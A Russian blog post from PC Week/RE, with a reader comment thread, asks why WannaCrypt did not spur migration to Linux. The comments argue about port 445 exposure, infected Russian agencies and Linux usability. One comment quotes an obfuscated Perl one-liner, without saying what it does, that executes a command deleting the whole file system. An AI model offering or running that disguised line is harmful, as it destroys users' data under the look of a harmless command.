Блог

WannaCrypt и популяризация Linux

Сергей Голубев
24.05.2017 11:30:57
Теги: Linux

Больше всего в истории с WannaCrypt меня удивила реакция Linux-сообщества. Точнее — практически полное её отсутствие. Возможно, некоторую роль тут сыграли соображения этического характера — мол, нехорошо использовать чужое горе в пропагандистских целях. Но мне думается, что в действительности всё значительно сложнее.

Я смог найти только одну статью, в которой ситуация разобрана достаточно подробно — «WannaCrypt makes an easy case for Linux». Автор — Джек Валлен. Итак, вот перечисленные им факты:
• WannaCrypt обладает способностью к распространению самого себя;
• WannaCrypt использует уязвимость в ОС Windows;
• WannaCrypt использует протокол SMB, широко используемый в корпоративных сетях;
• WannaCrypt создан АНБ;
• WannaCrypt заразил системы в 150 странах мира.

Возможна ли такая ситуация в Linux. Автор статьи утверждает, что нет. С ним сложно не согласится и здравый смысл подсказывает, что вот сейчас уж точно начнётся массовый переход на свободное ПО.

Однако, объективность требует рассмотреть и другие аргументы. Например, отсутствие некоторого программного обеспечения, работающего в Linux. Правда, Джек Валлен считает, что растущая популярность модели SaaS делает этот аргумент ничтожным. И снова он прав.

Однако, интуиция мне подсказывает, что никакой массовой миграции не произойдёт. Несмотря на все призывы Джека Валлена и других сторонников СПО.

Возможно, агитация действительно лишена смысла? И прежде всего потому, что ни Джек Валлен, ни остальные пропагандисты не понимают, в чём причины феномена популярности Linux. Разумеется, я тут не исключение — для меня это тоже загадка.

Может быть, именно поэтому история с WannaCrypt практически не используется для популяризации Linux? Уязвимости Windows никак не влияют на популярность этой системы. Почему? Мы не знаем.

Комментариев: 27

Только зарегистрированные и авторизованные пользователи могут добавлять комментарии

24.05.2017 13:14:32

Цитата
Больше всего в истории с WannaCrypt меня удивила реакция Linux-сообщества. Точнее — практически полное её отсутствие.

Каким макаром должен касаться пользователей Линукс зловред написанный для другой платформы?!
Цитата
Возможна ли такая ситуация в Linux. Автор статьи утверждает, что нет.

Джек Валлен - капитан очевидность. Чую эксперд не спал ночами чтобы выяснить невозможность работы в Линукс зловреда, написанного исключительно для другой ОС.
Цитата
Однако, интуиция мне подсказывает, что никакой массовой миграции не произойдёт. Несмотря на все призывы Джека Валлена и других сторонников СПО.

Вспоминается небольшой анекдот про смекалку - "Это 3.14ец, смекнул рядовой Иванов, когда 15 штыков пригвоздили его к стенке".
Сергей, у вас потрясающее "шестое чувство". Берегите его.
Я уже слышу топот несметной толпы Виндоус-хомячков ломанувшихся за Пингвином. Процент Винды медленно, но уверенно опустился на 1.5%, а Пингвин занял всё процентное поле конкурента. Ура... Теперь за малым процентом распространения Винда перестала интересовать вирусописателей и к ней постепенно стала переходить слава самой безопасной ОС от Пингвина. А Пингвин, наслаждаясь долгожданной и выстраданной победой, начал медленно и уверено догонять по загаженности своего младшего родственника - Андроида.
Цитата
Уязвимости Windows никак не влияют на популярность этой системы. Почему? Мы не знаем.

А, вот мы знаем!
Кстати, тут здорово могла бы помочь, упомянутая в четвёртом абзаце снизу, интуиция smile;)

PS А зачем вообще красноглазым друзьям знать что-то про Виндоус?

26.05.2017 01:25:53

Донат, я заметил, вы часто тут мелькаете, при чем всегда с узконаправленными и как бы глубокомысленными (то есть вам, похоже, кажется именно так) комментариями. Ответьте, пожалуйста, на один вопрос: если вам так нравится продукция одной редмондской компании, что именно вы забыли в этом блоге, который -- вы, может, не обратили внимания -- посвящен ПО с открытым кодом? Тут умные люди собираются, обсуждают вопросы интересные... Не мешали бы вы им, а? Ваши посты столько места занимают, их настолько надоедает пролистывать, честное слово...

26.05.2017 01:54:09

Надоело... не пролистывайте!

27.05.2017 20:06:26

Орден Петросяна Донатику два раза! Я так хохотался от вашего искрометного йумора...
Но я таки рад, что вы не предложили читать весь этот бред.

27.05.2017 20:28:13

Цитата
Но я таки рад, что вы не предложили читать весь этот бред.

Для тех, у кого не хватает мозгов самим догадаться как и что делать, я всегда даю простые и добрые советы!
Обращайтесь!

27.05.2017 23:07:07

О, я смотрю, тут орденами Петросяна дело не обойдется, придется заодно присвоить Донатику и звание "Заслуженный имбецил всея интернета "

27.05.2017 23:36:57

Цитата
Но я таки рад, что вы не предложили читать весь этот бред.

Хотя детские блоги по другому адресу и тебя тошнит от моих комментариев, но мне очень приятно, что ты преодолеваешь себя и продолжаешь меня читать.
Искренне благодарю.Спасибо.

29.05.2017 15:43:37

Вот этот ваш тон однозначно способствует популяризации Linux.

24.05.2017 14:03:37

Цитата
сыграли соображения этического характера

У линукс сообщества, да smile:D
Цитата
Возможна ли такая ситуация в Linux. Автор статьи утверждает, что нет.

Пока линукс настолько непопулярный - конечно невозможна. Тут, знаете, как с неуловимым Джо.
Цитата

— А почему его зовут Неуловимым Джо, Билли?
— Потому что его никто ещё не поймал, Гарри.
— А почему его никто ещё не поймал, Билли?
— Потому что он нафиг никому не нужен, Гарри.

Но ситуация такова, что линукс безопасный не по своей природе, а благодаря продвинутости пользователей системы. Если за линуксом будут работать люди далекие от понимания системы, они с удовольствием будут работать из под рута, или введут административный пароль на фишинговый запрос зловреда.
Всем известны всякие программы в одну строчку, типа этой
Код
perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'

и т.д.

24.05.2017 14:38:50

Ну и насчет агитации в пользу линукс.

Линукс рассчитан на людей, который четко понимают, чего они хотят и какие инструменты им для этого нужны. Возьмем хотя бы дистрибутивы. Сколько их там? Я думаю, что ответ "дохрена" - будет более, чем правильный. И вот представьте, что новичок, пытается понять, что ему из этого всего нужно. У него разбегаются глаза, он не понимает, ЗАЧЕМ сколько дистрибутивов. Он заходит на форум и просит совета. А ему: "Ну для новичка подойдет Debian, Ubuntu, Mint, Elementay OS, OpenSuse". Он думает: "Блин, что выбрать-то? О, Убунту я вроде где-то слышал, поставлю её." Смотрит, а там Ubuntu, Lubuntu, Kubuntu,Xubuntu. "Чё за?", - думает человек? А это среды рабочего стола, отвечает ему сообщество. У человека вообще кругом голова идти начинает. Он думает: "Слишком сложно, до свиданья".
Далее, если человек таки устанавливает систему, то начинается долги и мучительный квест по её настройке под себя. Допустим, человек обнаруживает, что в OpenSuse с KDE по умолчанию нет ярлыков на рабочем столе, а само рабочее пространство забито какими-то виджетами.
Или, например, что в Elementary OS не работает нормальное переключение раскладок клавиатуры. И что ему нужно вводить всякую дичь, типа:

Код
gsettings set org.pantheon.desktop.gala.keybindings switch-input-source "['<Alt>Shift_L', '<Alt>Shift_R', '<Shift>Alt_L', '<Shift>Alt_R']"

А дальше, если он таки продрался через дебри кастомизации - ему обязательно предстоит встретится с проблемами. Ну, например, дефолтовый плеер в Elementary OS вылетает каждые 5-10 минут, при проигрывании некоторых файлов.

И вас уверяю, мало кого интересуют такого рода квесты.

Так что пока ситуация не изменится - никакая агитация тут не поможет.

24.05.2017 14:39:03

А я вот не встречал сообщений об успешных атаках WannaCrypt на коммерческие и облачные ЦОДы. Если им действительно удалось отбиться (а там ведь есть системы на Windiws Server), то это будет сильный аргумент в пользу облаков.

24.05.2017 14:42:28

Ну само собой, не все же оставляют 445 порт открытым и игнорируют обновления безопасности smile:D

24.05.2017 15:02:13

Цитата
Если им действительно удалось отбиться

Не отбивались они не от чего. По умолчанию 445 порт на внешних интерфейсах граничных устройств (фаерволах) закрыт.
Его можно открыть принудительно, только по глупости. Но и просто открыть мало. Что бы он сработал, какой-либо сервис, должен его "слушать".

24.05.2017 18:26:19

То есть, МВД, ГИБДД и прочие конторы продемонстрировали свою "особую" бдительность. smile:o Заманили вирус. smile8)

24.05.2017 18:44:47

Плюс Мегафон!

24.05.2017 19:41:07

МВД писало, что сотрудники отключали рабочие компьютеры от основной сети и подключали разными способами к Интернету. Это конечно кое-что проясняет, но на самом деле, вызывает ещё больше вопросов.

25.05.2017 03:22:32

То, что сотрудники МВД подключались к интернету "разными способами" по-моему вполне логично. Странно было-бы вести оперативную работу и светиться IP МВД,. А вот как объяснить удачные атаки на Мегафон и испанскую телекоммуникационную компанию «Telefónica»? Там ведь работают профи! Не думаю, что они специально светили 445 порт и не ставили обновы.

25.05.2017 07:37:14

Цитата
То, что сотрудники МВД подключались к интернету "разными способами" по-моему вполне логично. Странно было-бы вести оперативную работу и светиться IP МВД

Какая оперативная работа, каким IP не светиться? Господи, что за бред?! Это за "вполне логичную" следственную работу руководство МВД проводит служебную проверку и квалифицирует, как "нарушение отдельными сотрудниками использования информационных средств"?!
Цитата
А вот как объяснить удачные атаки на Мегафон и испанскую телекоммуникационную компанию «Telefónica»?

Мегафон, а так же в Минздрав и РЖД тоже "вели оперативную работу"?

26.05.2017 05:51:29

Цитата
Какая оперативная работа, каким IP не светиться? Господи, что за бред?!


Объяснитесь, пожалуйста. Вы знаток работы ИТ в силовых ведомствах? или так...
Я вот не знаток, могу только предполагать, просветите!


26.05.2017 08:11:06

А вы?

26.05.2017 09:30:49

Что я? Я могу только предполагать! Я и пишу, что предполагаю. Вы же обзываете мои предоложение бредом. Так хоть потрудитесь объясниться? Вы же в приличном обществе.

26.05.2017 10:20:41

Нет никаких "знатоков работы ИТ в силовых ведомствах". Нет никакой единой структуры ИТ ни в одном силовом ведомстве. Силовые ведомства разные. У каждого своя специфика. Кроме всего прочего, это территориально-распределённые структуры. ИТ в них строится одной стороны на общей специфике ИТ-ой области в целом, а так же на специфике каждого силового ведомства в отдельности. И да, я работал в ИТ в двух силовых ведомствах - ВС РФ и МВД.
Как вам помогла это информация? Вам стало лучше понятна специфика произошедшего инцидента? Что изменилось? Вы перестали обижаться на слово "бред"?

26.05.2017 11:43:25

Смею поставить Ваши утверждения под сомнение. Как тогда зараза поразила столько регионально разбросанных по стране персональных компьютеров МВД, если нет общей инфраструктуры?

26.05.2017 12:43:46

У меня два вопроса - первый - что вы подразумеваете под "общей инфраструктурой" и,второй, о каких IP-адресах МВД вы ведёте речь?

26.05.2017 20:38:12

Отвечать вопросом на вопрос как-то некомильфо, ну да ладно. Повторюсь, понятия не имею, как организована ИТ инфраструктура МВД, но массовое заражение именнно через самбу дает мне основания предполагать, что либо персональные компьютеры сотрудников видят друг друга по этому протоколу, либо заражение шло через общий сервер (но это в МВД отрицают, ибо сервера не пострадали). Каким образом они видят друг друга вопрос технически несложный, важнее вопрос почему не было никакой защиты внутри сетей.
IP МВД... ну есть же у каждого конкретного подразделения выход в Интернет, значит есть и IP. Думаю кому надо знают их все и во всех регионах.

25.05.2017 07:42:08

Цитата
Там ведь работают профи! Не думаю, что они специально светили 445 порт и не ставили обновы.

Если там "крутые профи", порты закрыты и ставятся обновления - каким образом они "намотали на винт" зловреда?!

26.05.2017 06:58:07

ЦОД'ы чистой Windows в сети не светятся.
Мне особо не попадались ЦОД'ы с открытым портом SMB протокола наружу - обычно используют другое ПО для доступа к расшаренным данным.

Только зарегистрированные и авторизованные пользователи могут добавлять комментарии

Интересно

Опрос

Решение компании Canonical о прекращении развития Unity

  1. Как повлияет отказ от Unity на популярность системы Ubuntu?
Защита от автоматических сообщений
Защита от автоматических сообщений

Статьи

USBGuard — незаменимая утилита для Linux-администратора
Изначально выпуск USB-накопителей задумывался производителями как средство хранения или инструмент для удобного …

Open Source на предприятиях — популярность растет, но опасения сохраняются
Проекты с открытым исходным кодом лежат в основе многих популярных мобильных и настольных приложений …

Docker намерена усилить безопасность ядра Linux с помощью LinuxKit
Проект LinuxKit инкубирует несколько технологий повышения безопасности Linux, включая Wireguard VPN и Landlock …

Документация на основе пользовательского опыта
Хорошая документация играет решающую роль в открытом проекте. Это подтверждают как многочисленные эксперты, так …

Red Hat: знания Linux достаточно для развертывания OpenStack
На сегодняшний день OpenStack — основная Open Soure-платформа для облачных вычислений. Её поддержкой …

Мы в социальных сетях

PC Week/RE в Facebook PC Week/RE в Контакте PC Week/RE в Google+ PC Week/RE в Одноклассниках PC Week/RE в Twitter

Решения

Alfresco. Принципиальная архитектура и область применения
Alfresco — платформа ECM, предназначенная для решения задач управления всем контентом организации. На базе этой …

Обновление MS Exchange: варианты и экономическая эффективность
Говоря о ТСО системы поставщики, как правило, считают только стоимость лицензий. В этом случае цена выглядит более …

Проектирование и разработка авионики: перспективы свободного программного обеспечения
Презентация Хорошилова А.В., старшего научного сотрудника ИСП РАН, на Российском СПО-саммите ROSS '2011, Москва, 12 …

The Biggest Infrastructure Market Yet to Fall to Open Source
Презентация Клейна С., управляющего директора EnterpriseDB, на Российском СПО-саммите ROSS '2011, Москва, 12 апреля …

Alfresco Open Source ECM
Презентация Дорваля Д., вице-президента Alfresco, на Российском СПО-саммите ROSS '2011, Москва, 12 апреля 2011 года.

Блог

Вымогатель Erebus атакует Linux
Во вчерашней заметке я написал, что использование недостатков чужих решений для продвижения своего — ...

Поможет ли эпидемия WannaCry мюнхенскому проекту?
Пока окончательное решение о судьбе знаменитого мюнхенского проекта ещё не принято, сторонники продо ...

Вышла очередная версия браузера Vivaldi
Доступна для загрузки очередная версия браузера Vivaldi 1.10, разработчики которого продолжают разви ...

Microsoft присоединяется к Cloud Foundry Foundation
Корпорация Microsoft стала «золотым» участником некоммерческой организации Cloud Foundry Foundation. ...

Google против рекламы
Первого июня в Chromium Blog появилось очень интересное сообщение. В нём говорится, что компания Goo ...

 

Лидеры читательского рейтинга

Статьи

Записи в блогах

Панорама

Гиперконвергированная инфраструктура, отвечающая современным требованиям ведения бизнеса
Цифровая экономика изменила все аспекты ведения бизнеса. Пользователи становятся более требовательными, технологии постоянно развиваются, и от ИТ-отделов ожидают большей адаптивности и быстроты реагирования, чем прежде.
Новая услуга Техносерв Cloud — облачное хранилище данных
Компания “Техносерв” запустила новую услугу на базе собственной облачной платформы Техносерв Cloud — “Облачное хранилище данных”.
Цифровые рабочие области придут на смену модели клиент-сервер
В наступившей эпохе мобильности и облаков речь идет не только о своевременном предоставлении приложений, но также об упрощении процессов, ускоряющих выполнение рабочих задач.
Руководство по выбору корпоративных программных систем (ERP, EAM, CPQ, SCM)
По данным недавнего отчета Aberdeen Group «Значение обновления ERP: управление современными технологиями», компании, развертывающие современные ERP-системы, заметно опережают своих конкурентов.
История успеха: Dab Pumps значительно повышает свою производительность во всем мире с помощью Infor
Dab Pumps — ведущий поставщик оборудования, который ежегодно производит 3 миллиона приводных водяных насосов.

Интересно

 

Создание сайта - студия iMake
© 2017 АО «СК ПРЕСС».
Информация об авторских правах и порядке использования материалов сайта.
Правила поведения на сайте.

На главную PC Week/RE  |  Об издании  |  Архив номеров  |  Подписка на бумажную версию
Другие проекты «СК ПРЕСС»ITRNБестселлеры IT-рынкаByte/РоссияCRN/REIntelligent Enterprise/REPC Magazine/RE.